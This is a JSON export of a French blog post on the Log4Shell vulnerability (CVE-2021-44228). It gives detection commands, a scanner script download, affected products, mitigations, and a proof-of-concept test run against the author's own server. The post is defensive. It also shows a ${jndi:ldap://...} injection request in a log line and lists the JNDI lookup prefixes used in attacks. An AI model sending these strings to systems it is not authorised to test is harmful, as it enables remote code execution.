{"id":1356,"date":"2021-12-16T10:59:05","date_gmt":"2021-12-16T09:59:05","guid":{"rendered":"https:\/\/siteperso.info\/?p=1356"},"modified":"2026-07-10T19:02:44","modified_gmt":"2026-07-10T17:02:44","slug":"cve-2021-44228-log4shell","status":"publish","type":"post","link":"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/","title":{"rendered":"CVE-2021-44228 : Log4Shell"},"content":{"rendered":"\n<a href=\"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/check_log4shell.bash\" target=\"_blank\" rel=\"noreferrer noopener\">check_log4shell.bash (version 1.1)<\/a><a href=\"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/check_log4shell.bash\" download=\"\">T\u00e9l\u00e9charger<\/a>\n\n<h2 class=\"wp-block-heading\">Impact<\/h2>\n\n<p class=\"wp-block-paragraph\">Tout ce qui utilise le framework de journalisation d&rsquo;Apache nomm\u00e9 Log4J est susceptible d&rsquo;\u00eatre impact\u00e9. Les applications concern\u00e9es sont g\u00e9n\u00e9ralement reconnaissables au fait qu&rsquo;elles poss\u00e8dent le fichier log4j-core.jar.<\/p>\n\n<p class=\"wp-block-paragraph\">Les versions d\u00e9clar\u00e9es concern\u00e9es comme faillibles de log4j-core sont :<\/p>\n\n<ul class=\"wp-block-list\">\n<li>De la version 2.0-beta9 \u00e0 la version 2.12.1 (Java7)<\/li>\n<li>De la version 2.13.0 \u00e0 la version 2.15.0 (Java8)<\/li>\n<\/ul>\n\n<p class=\"wp-block-paragraph\">Toutefois, je ne vous recommande pas de vous fier \u00e0 ces valeurs, car la classe r\u00e9ellement en d\u00e9faut (JndiLookup.class) est embarqu\u00e9e. J&rsquo;ai constat\u00e9 que certains \u00e9diteurs avaient repris une version de JndiLookup.class faillible dans un core non r\u00e9pertori\u00e9 comme faillible.<\/p>\n\n<p class=\"wp-block-paragraph\">Quelque soit la version de log4j-core que vous utilisez, je vous recommande de tester et de mitiger. De plus ne cherchez pas seulement si vous utilisez log4j-core mais aussi si vous utilisez directement JndiLookup.class.<\/p>\n\n<h2 class=\"wp-block-heading\">Comment chercher si le fichier en d\u00e9faut est pr\u00e9sent sur votre syst\u00e8me ?<\/h2>\n\n<p class=\"wp-block-paragraph\">Sur un syst\u00e8me Linux, recherchez tous les .jar log4j-core et v\u00e9rifiez la pr\u00e9sence de JndiLookup.class. Cela ne vous dira pas si vous l&rsquo;utilisez, mais si vous le poss\u00e9dez. Donc si vous \u00eates susceptible de l&rsquo;utiliser.<\/p>\n\n<pre><code>find \/ -type f -name \"log4j-core-*.jar\" -exec unzip -l \"{}\" ; 2&gt;\/dev\/null | grep -i JndiLookup.class<\/code><\/pre>\n\n<p class=\"wp-block-paragraph\">V\u00e9rifiez aussi les fichiers .ear, ils peuvent contenir le jar log4j-core.<\/p>\n\n<pre><code>find \/ -type f -name \"*.ear\" -exec unzip -l \"{}\" ; 2&gt;\/dev\/null | grep -i log4j-core<\/code><\/pre>\n\n<p class=\"wp-block-paragraph\">Les fichiers .war, :<\/p>\n\n<pre><code>find \/ -type f -name \"*.war\" -exec unzip -l \"{}\" ; 2&gt;\/dev\/null | grep -i log4j-core<\/code><\/pre>\n\n<p class=\"wp-block-paragraph\">Et enfin, v\u00e9rifiez la pr\u00e9sence directe de JndiLookup.class.<\/p>\n\n<pre><code>find \/ type f -name \"JndiLookup.class\"<\/code><\/pre>\n\n<h2 class=\"wp-block-heading\">log4shell.bash<\/h2>\n\n<p class=\"wp-block-paragraph\"><strong>Voici check_log4shell.bash, un script maison pour scanner vos serveurs Linux.<\/strong><\/p>\n\n<ul class=\"wp-block-list\">\n<li>Inspecte les fichiers ear, war, class et jar<\/li>\n<li>3 modes : default \/ suspicious \/ paranoid pour inspecter log4j-core*.jar, *log4j*.jar ou *.jar<\/li>\n<li>Inspecte les fichiers jar contenus dans les fichiers war<\/li>\n<li>Inspecte les fichiers META-INF contenus dans les fichiers ear<\/li>\n<li>Possibilit\u00e9 de changer le chemin de la recherche<\/li>\n<li>Filtrage des \u00e9v\u00e8nements : infos, warnings, errors, statistiques<\/li>\n<li>Statistiques<\/li>\n<\/ul>\n\n<figure><a href=\"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/log4shell.png\"><img decoding=\"async\" src=\"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/log4shell-1024x555.png\" alt=\"\" \/><\/a><\/figure>\n\n<a href=\"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/check_log4shell.bash\" target=\"_blank\" rel=\"noreferrer noopener\">check_log4shell.bash (version 1.1)<\/a><a href=\"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/check_log4shell.bash\" download=\"\">T\u00e9l\u00e9charger<\/a>\n\n<h2 class=\"wp-block-heading\">Produits impact\u00e9s<\/h2>\n\n<p class=\"wp-block-paragraph\">Voici une liste non exhaustive de produits que l&rsquo;on sait impact\u00e9s par cette faille :<\/p>\n\n<ul class=\"wp-block-list\">\n<li>RedHat, par le biais d&rsquo;Openshift et de certains JBoss<\/li>\n<li>Jenkins, si vous utilisez le plugins Log4J<\/li>\n<li>Apache SOLR<\/li>\n<li>VMWare<\/li>\n<li>Citrix<\/li>\n<li>Atlassian<\/li>\n<li>NetApp<\/li>\n<li>SonarQube<\/li>\n<\/ul>\n\n<p class=\"wp-block-paragraph\"><strong>Ce n&rsquo;est pas parce que vous avec un fichier log4j que vous \u00eates concern\u00e9 !!!<\/strong> <strong>Encore une fois, la faille est dans la classe JndiLookup.class.<\/strong><\/p>\n\n<p class=\"wp-block-paragraph\"><strong>V\u00e9rifiez dans le jar la pr\u00e9sence du fichier JndiLookup.class avant de paniquer, un .jar est un .zip, utilisez votre d\u00e9compresseur pr\u00e9f\u00e9r\u00e9.<\/strong><\/p>\n\n<h2 class=\"wp-block-heading\">Proof of Concept (POC)<\/h2>\n\n<p class=\"wp-block-paragraph\">Pour comprendre comment et pourquoi mitiger, il est n\u00e9cessaire de comprendre le POC.<\/p>\n\n<p class=\"wp-block-paragraph\">Celui qui me semble le plus facile \u00e0 mettre en \u0153uvre et \u00e0 lire est celui-ci : <a href=\"https:\/\/github.com\/NorthwaveSecurity\/log4jcheck\/blob\/main\/nw_log4jcheck.py\">nw_log4jcheck.py<\/a><\/p>\n\n<p class=\"wp-block-paragraph\">Il vous faudra Python3 pour l&rsquo;ex\u00e9cuter. Vous devez changer la valeur de HOSTNAME dans le script avant de vous en servir :<\/p>\n\n<figure><a href=\"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/image-1.png\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/image-1-1024x539.png\" alt=\"\" width=\"674\" height=\"354\" \/><\/a><\/figure>\n\n<p class=\"wp-block-paragraph\">Vous devez aussi cr\u00e9er le r\u00e9pertoire, voire le fichier dans lequel le script \u00e9crira ses logs :<\/p>\n\n<pre><code>mkdir -p \/var\/log\/named\n&gt; \/var\/log\/named\/query.log<\/code><\/pre>\n\n<p class=\"wp-block-paragraph\">Cherchez ensuite tout les ports WEB ouverts (Java, httpd, etc.) sur votre plateforme :<\/p>\n\n<pre><code>netstat -tulpn<\/code><\/pre>\n\n<figure><a href=\"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/image-2.png\"><img decoding=\"async\" src=\"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/image-2-1024x539.png\" alt=\"\" \/><\/a><\/figure>\n\n<p class=\"wp-block-paragraph\">Dans cet exemple, l&rsquo;on peut voir diff\u00e9rents ports qui m\u00e9ritent d&rsquo;\u00eatre v\u00e9rifi\u00e9s :<\/p>\n\n<p class=\"wp-block-paragraph\">Les ports 8005 et 8081 (java) ainsi que le port 443 (httpd).<\/p>\n\n<p class=\"wp-block-paragraph\">Utilisez le script sur chacun des ports :<\/p>\n\n<pre><code>python3 .\/nw_log4jcheck.py https:\/\/siteperso.info:443<\/code><\/pre>\n\n<figure><a href=\"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/image-3.png\"><img decoding=\"async\" src=\"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/image-3-1024x539.png\" alt=\"\" \/><\/a>\n<figcaption>R\u00e9sultat du scan sur le port 443<\/figcaption>\n<\/figure>\n\n<p class=\"wp-block-paragraph\">Le port 443 est d\u00e9livr\u00e9 sur ce serveur par Apache (httpd). En regardant les logs g\u00e9n\u00e9r\u00e9s par le test je peux voir ceci :<\/p>\n\n<pre><code>\"[16\/Dec\/2021:10:46:29 +0100]\" \"7499\" \"HTTP\/1.1\" \"-\" \"python-requests\/2.26.0\" \"\/${jndi:ldap:\/56549fb9-f720-455f-a0c0-c40b55693bec.siteperso.info\/test.class}\" \"15.188.192.249\" \"+\" \"<strong>403<\/strong>\" \"1147\" \"<strong>GET \/$%7Bjndi:ldap:\/\/56549fb9-f720-455f-a0c0-c40b55693bec.siteperso.info\/test.class%7D<\/strong> HTTP\/1.1\" \"siteperso.info:443\" \"GET\" \"-\" \"-\" \"-\" \"-\" \"TLSv1.3\" \"TLS_AES_256_GCM_SHA384\" \"-\"<\/code><\/pre>\n\n<p class=\"wp-block-paragraph\">En rouge, l&rsquo;on peut voir l&rsquo;URL appel\u00e9e par le POC, il essaie de contacter le service jndi:ldap. On peut observer que le serveur a r\u00e9pondu avec un code HTTP 403 : Forbidden.<\/p>\n\n<p class=\"wp-block-paragraph\">Commencez \u00e0 s\u00e9rieusement vous inqui\u00e9ter si vous avez un code HTTP 200.<\/p>\n\n<p class=\"wp-block-paragraph\">Les URLS attaquables ne commencent pas uniquement par $jndi:ldap, le POC est focalis\u00e9 sur ceci mais en voici la liste compl\u00e8te :<\/p>\n\n<ul class=\"wp-block-list\">\n<li>${jndi:ldap:\/}<\/li>\n<li>${jndi:ldaps:\/}<\/li>\n<li>${jndi:rmi:\/}<\/li>\n<li>${jndi:dns:\/}<\/li>\n<li>${jndi:iiop:\/}<\/li>\n<\/ul>\n\n<p class=\"wp-block-paragraph\">Evidement, selon la technologie du port ouvert, vous devrez aller dans les logs ad\u00e9quats pour voir ce r\u00e9sultat.<\/p>\n\n<h2 class=\"wp-block-heading\">Comment se prot\u00e9ger<\/h2>\n\n<p class=\"wp-block-paragraph\">L\u2019action prioritaire est de mettre \u00e0 jour Log4J vers la version 2.16.0, via les gestionnaires de paquets habituels ou via un t\u00e9l\u00e9chargement direct depuis\u00a0<a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/download.html\">https:\/\/logging.apache.org\/log4j\/2.x\/download.html<\/a>.<\/p>\n\n<p class=\"wp-block-paragraph\">Il est aussi possible de r\u00e9duire le degr\u00e9 d\u2019exploitabilit\u00e9 de la vuln\u00e9rabilit\u00e9 en mettant la variable d\u2019environnement\u00a0<code>LOG4J_FORMAT_MSG_NO_LOOKUPS<\/code>\u00a0\u00e0\u00a0<code>true<\/code>. Cette contremesure ne fonctionne cependant que pour les versions de Log4J sup\u00e9rieures ou \u00e9gales \u00e0 2.10.<\/p>\n\n<p class=\"wp-block-paragraph\">Vous pouvez aussi compl\u00e8tement supprimer la classe du fichier .jar :<\/p>\n\n<pre><code>zip -q -d log4j-core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class\n<\/code><\/pre>\n\n<p class=\"wp-block-paragraph\">Il n&rsquo;y a pas de solution propre \u00e0 ce jour pour corriger si vous \u00eates en Java7. Supprimez la classe comme ci-dessus, mitigez avec l&rsquo;option JAVA, prot\u00e9gez les URLS&#8230;<\/p>\n\n<h2 class=\"wp-block-heading\">La faille expliqu\u00e9e au grand complet<\/h2>\n\n<figure>\nhttps:\/\/nakedsecurity.sophos.com\/2021\/12\/13\/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it\/\n<\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Impact Tout ce qui utilise le framework de journalisation d&rsquo;Apache nomm\u00e9 Log4J est susceptible d&rsquo;\u00eatre impact\u00e9. Les applications concern\u00e9es sont g\u00e9n\u00e9ralement reconnaissables au fait qu&rsquo;elles poss\u00e8dent le fichier log4j-core.jar. Les versions d\u00e9clar\u00e9es concern\u00e9es comme faillibles de log4j-core sont : De la version 2.0-beta9 \u00e0 la version 2.12.1 (Java7) De la version 2.13.0 \u00e0 la version &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/\" class=\"more-link\">Continuer la lecture<span class=\"screen-reader-text\"> de &laquo;&nbsp;CVE-2021-44228 : Log4Shell&nbsp;&raquo;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":1396,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,9],"tags":[],"class_list":["post-1356","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurite","category-informatique"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>CVE-2021-44228 : Log4Shell - SITEPERSO.INFO<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2021-44228 : Log4Shell - SITEPERSO.INFO\" \/>\n<meta property=\"og:description\" content=\"Impact Tout ce qui utilise le framework de journalisation d&rsquo;Apache nomm\u00e9 Log4J est susceptible d&rsquo;\u00eatre impact\u00e9. Les applications concern\u00e9es sont g\u00e9n\u00e9ralement reconnaissables au fait qu&rsquo;elles poss\u00e8dent le fichier log4j-core.jar. Les versions d\u00e9clar\u00e9es concern\u00e9es comme faillibles de log4j-core sont : De la version 2.0-beta9 \u00e0 la version 2.12.1 (Java7) De la version 2.13.0 \u00e0 la version &hellip; Continuer la lecture de &laquo;&nbsp;CVE-2021-44228 : Log4Shell&nbsp;&raquo;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/\" \/>\n<meta property=\"og:site_name\" content=\"SITEPERSO.INFO\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-16T09:59:05+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-07-10T17:02:44+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/log4shell.gif\" \/>\n\t<meta property=\"og:image:width\" content=\"728\" \/>\n\t<meta property=\"og:image:height\" content=\"380\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/gif\" \/>\n<meta name=\"author\" content=\"C\u00e9dric Courlet\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"C\u00e9dric Courlet\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/siteperso.info\\\/index.php\\\/2021\\\/12\\\/16\\\/cve-2021-44228-log4shell\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/siteperso.info\\\/index.php\\\/2021\\\/12\\\/16\\\/cve-2021-44228-log4shell\\\/\"},\"author\":{\"name\":\"C\u00e9dric Courlet\",\"@id\":\"https:\\\/\\\/siteperso.info\\\/#\\\/schema\\\/person\\\/515b5076fb806661532931ce8d7b9833\"},\"headline\":\"CVE-2021-44228 : Log4Shell\",\"datePublished\":\"2021-12-16T09:59:05+00:00\",\"dateModified\":\"2026-07-10T17:02:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/siteperso.info\\\/index.php\\\/2021\\\/12\\\/16\\\/cve-2021-44228-log4shell\\\/\"},\"wordCount\":812,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/siteperso.info\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/siteperso.info\\\/index.php\\\/2021\\\/12\\\/16\\\/cve-2021-44228-log4shell\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/siteperso.info\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/log4shell.gif\",\"articleSection\":[\"Cybers\u00e9curit\u00e9\",\"Informatique\"],\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/siteperso.info\\\/index.php\\\/2021\\\/12\\\/16\\\/cve-2021-44228-log4shell\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/siteperso.info\\\/index.php\\\/2021\\\/12\\\/16\\\/cve-2021-44228-log4shell\\\/\",\"url\":\"https:\\\/\\\/siteperso.info\\\/index.php\\\/2021\\\/12\\\/16\\\/cve-2021-44228-log4shell\\\/\",\"name\":\"CVE-2021-44228 : Log4Shell - SITEPERSO.INFO\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/siteperso.info\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/siteperso.info\\\/index.php\\\/2021\\\/12\\\/16\\\/cve-2021-44228-log4shell\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/siteperso.info\\\/index.php\\\/2021\\\/12\\\/16\\\/cve-2021-44228-log4shell\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/siteperso.info\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/log4shell.gif\",\"datePublished\":\"2021-12-16T09:59:05+00:00\",\"dateModified\":\"2026-07-10T17:02:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/siteperso.info\\\/index.php\\\/2021\\\/12\\\/16\\\/cve-2021-44228-log4shell\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/siteperso.info\\\/index.php\\\/2021\\\/12\\\/16\\\/cve-2021-44228-log4shell\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/siteperso.info\\\/index.php\\\/2021\\\/12\\\/16\\\/cve-2021-44228-log4shell\\\/#primaryimage\",\"url\":\"https:\\\/\\\/siteperso.info\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/log4shell.gif\",\"contentUrl\":\"https:\\\/\\\/siteperso.info\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/log4shell.gif\",\"width\":728,\"height\":380},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/siteperso.info\\\/index.php\\\/2021\\\/12\\\/16\\\/cve-2021-44228-log4shell\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/siteperso.info\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CVE-2021-44228 : Log4Shell\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/siteperso.info\\\/#website\",\"url\":\"https:\\\/\\\/siteperso.info\\\/\",\"name\":\"SITEPERSO.INFO\",\"description\":\"---===[ Espace personnel de C\u00e9dric Courlet ]===---\",\"publisher\":{\"@id\":\"https:\\\/\\\/siteperso.info\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/siteperso.info\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/siteperso.info\\\/#organization\",\"name\":\"SITEPERSO.INFO\",\"url\":\"https:\\\/\\\/siteperso.info\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/siteperso.info\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/siteperso.info\\\/wp-content\\\/uploads\\\/2021\\\/10\\\/electronics-512.png\",\"contentUrl\":\"https:\\\/\\\/siteperso.info\\\/wp-content\\\/uploads\\\/2021\\\/10\\\/electronics-512.png\",\"width\":512,\"height\":512,\"caption\":\"SITEPERSO.INFO\"},\"image\":{\"@id\":\"https:\\\/\\\/siteperso.info\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/siteperso.info\\\/#\\\/schema\\\/person\\\/515b5076fb806661532931ce8d7b9833\",\"name\":\"C\u00e9dric Courlet\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/siteperso.info\\\/wp-content\\\/uploads\\\/2021\\\/10\\\/avatar_user_1_1634652193-96x96.jpg\",\"url\":\"https:\\\/\\\/siteperso.info\\\/wp-content\\\/uploads\\\/2021\\\/10\\\/avatar_user_1_1634652193-96x96.jpg\",\"contentUrl\":\"https:\\\/\\\/siteperso.info\\\/wp-content\\\/uploads\\\/2021\\\/10\\\/avatar_user_1_1634652193-96x96.jpg\",\"caption\":\"C\u00e9dric Courlet\"},\"sameAs\":[\"http:\\\/\\\/siteperso.info\"],\"url\":\"https:\\\/\\\/siteperso.info\\\/index.php\\\/author\\\/admin7824\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CVE-2021-44228 : Log4Shell - SITEPERSO.INFO","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/","og_locale":"fr_FR","og_type":"article","og_title":"CVE-2021-44228 : Log4Shell - SITEPERSO.INFO","og_description":"Impact Tout ce qui utilise le framework de journalisation d&rsquo;Apache nomm\u00e9 Log4J est susceptible d&rsquo;\u00eatre impact\u00e9. Les applications concern\u00e9es sont g\u00e9n\u00e9ralement reconnaissables au fait qu&rsquo;elles poss\u00e8dent le fichier log4j-core.jar. Les versions d\u00e9clar\u00e9es concern\u00e9es comme faillibles de log4j-core sont : De la version 2.0-beta9 \u00e0 la version 2.12.1 (Java7) De la version 2.13.0 \u00e0 la version &hellip; Continuer la lecture de &laquo;&nbsp;CVE-2021-44228 : Log4Shell&nbsp;&raquo;","og_url":"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/","og_site_name":"SITEPERSO.INFO","article_published_time":"2021-12-16T09:59:05+00:00","article_modified_time":"2026-07-10T17:02:44+00:00","og_image":[{"width":728,"height":380,"url":"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/log4shell.gif","type":"image\/gif"}],"author":"C\u00e9dric Courlet","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"C\u00e9dric Courlet","Dur\u00e9e de lecture estim\u00e9e":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/#article","isPartOf":{"@id":"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/"},"author":{"name":"C\u00e9dric Courlet","@id":"https:\/\/siteperso.info\/#\/schema\/person\/515b5076fb806661532931ce8d7b9833"},"headline":"CVE-2021-44228 : Log4Shell","datePublished":"2021-12-16T09:59:05+00:00","dateModified":"2026-07-10T17:02:44+00:00","mainEntityOfPage":{"@id":"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/"},"wordCount":812,"commentCount":0,"publisher":{"@id":"https:\/\/siteperso.info\/#organization"},"image":{"@id":"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/#primaryimage"},"thumbnailUrl":"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/log4shell.gif","articleSection":["Cybers\u00e9curit\u00e9","Informatique"],"inLanguage":"fr-FR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/","url":"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/","name":"CVE-2021-44228 : Log4Shell - SITEPERSO.INFO","isPartOf":{"@id":"https:\/\/siteperso.info\/#website"},"primaryImageOfPage":{"@id":"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/#primaryimage"},"image":{"@id":"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/#primaryimage"},"thumbnailUrl":"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/log4shell.gif","datePublished":"2021-12-16T09:59:05+00:00","dateModified":"2026-07-10T17:02:44+00:00","breadcrumb":{"@id":"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/#primaryimage","url":"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/log4shell.gif","contentUrl":"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/12\/log4shell.gif","width":728,"height":380},{"@type":"BreadcrumbList","@id":"https:\/\/siteperso.info\/index.php\/2021\/12\/16\/cve-2021-44228-log4shell\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/siteperso.info\/"},{"@type":"ListItem","position":2,"name":"CVE-2021-44228 : Log4Shell"}]},{"@type":"WebSite","@id":"https:\/\/siteperso.info\/#website","url":"https:\/\/siteperso.info\/","name":"SITEPERSO.INFO","description":"---===[ Espace personnel de C\u00e9dric Courlet ]===---","publisher":{"@id":"https:\/\/siteperso.info\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/siteperso.info\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/siteperso.info\/#organization","name":"SITEPERSO.INFO","url":"https:\/\/siteperso.info\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/siteperso.info\/#\/schema\/logo\/image\/","url":"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/10\/electronics-512.png","contentUrl":"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/10\/electronics-512.png","width":512,"height":512,"caption":"SITEPERSO.INFO"},"image":{"@id":"https:\/\/siteperso.info\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/siteperso.info\/#\/schema\/person\/515b5076fb806661532931ce8d7b9833","name":"C\u00e9dric Courlet","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/10\/avatar_user_1_1634652193-96x96.jpg","url":"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/10\/avatar_user_1_1634652193-96x96.jpg","contentUrl":"https:\/\/siteperso.info\/wp-content\/uploads\/2021\/10\/avatar_user_1_1634652193-96x96.jpg","caption":"C\u00e9dric Courlet"},"sameAs":["http:\/\/siteperso.info"],"url":"https:\/\/siteperso.info\/index.php\/author\/admin7824\/"}]}},"_links":{"self":[{"href":"https:\/\/siteperso.info\/index.php\/wp-json\/wp\/v2\/posts\/1356","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/siteperso.info\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/siteperso.info\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/siteperso.info\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/siteperso.info\/index.php\/wp-json\/wp\/v2\/comments?post=1356"}],"version-history":[{"count":10,"href":"https:\/\/siteperso.info\/index.php\/wp-json\/wp\/v2\/posts\/1356\/revisions"}],"predecessor-version":[{"id":3022,"href":"https:\/\/siteperso.info\/index.php\/wp-json\/wp\/v2\/posts\/1356\/revisions\/3022"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/siteperso.info\/index.php\/wp-json\/wp\/v2\/media\/1396"}],"wp:attachment":[{"href":"https:\/\/siteperso.info\/index.php\/wp-json\/wp\/v2\/media?parent=1356"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/siteperso.info\/index.php\/wp-json\/wp\/v2\/categories?post=1356"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/siteperso.info\/index.php\/wp-json\/wp\/v2\/tags?post=1356"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}